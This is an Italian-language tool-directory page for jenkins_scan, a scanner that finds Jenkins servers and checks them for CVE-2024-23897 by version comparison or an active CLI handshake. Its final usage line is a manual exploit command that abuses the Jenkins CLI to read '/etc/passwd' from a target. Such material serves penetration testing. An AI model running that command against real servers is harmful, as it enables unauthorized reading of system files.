Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
jenkins_scan — Trova l'ambiente jenkins e verifica la presenza di CVE-2024-23897 | Kitploit
Strumenti/GitHubGitHub/w41l3r/jenkins_scan
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubw41l3r/jenkins_scan

jenkins_scan

Trova l'ambiente jenkins e verifica la presenza di CVE-2024-23897

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

jenkins_scan

Trova ambienti Jenkins e verifica la CVE-2024-23897

Come funziona

Rilevamento di Jenkins

Testa i percorsi: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

Identifica tramite:

  1. Header X-Jenkins — il più affidabile, restituisce anche la versione
  2. Header X-Hudson — istanze più vecchie
  3. Body HTML — stringhe come "login to jenkins", "hudson.model", ecc.
  4. /api/json — conferma tramite la struttura JSON (_class, jobs, views)

Verifica della CVE-2024-23897

Passiva (predefinita): confronta la versione rilevata con le soglie:

  • Weekly: < 2.442 → vulnerabile
  • LTS: < 2.426.3 → vulnerabile

Attiva (--active): invia l'handshake del protocollo binario del Jenkins CLI su HTTP. Se il server risponde 200 + Content-Type: application/octet-stream, conferma che il canale CLI è aperto e l'exploit è applicabile.

Uso

Scansione di base

python jenkins_scan.py -f urls.txt

Con probe attiva + Burp come proxy + output su file

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20 thread, verbose, senza colori (per pipe/grep)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

Confermare manualmente l'exploit su un target vulnerabile

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

Scarica lo strumento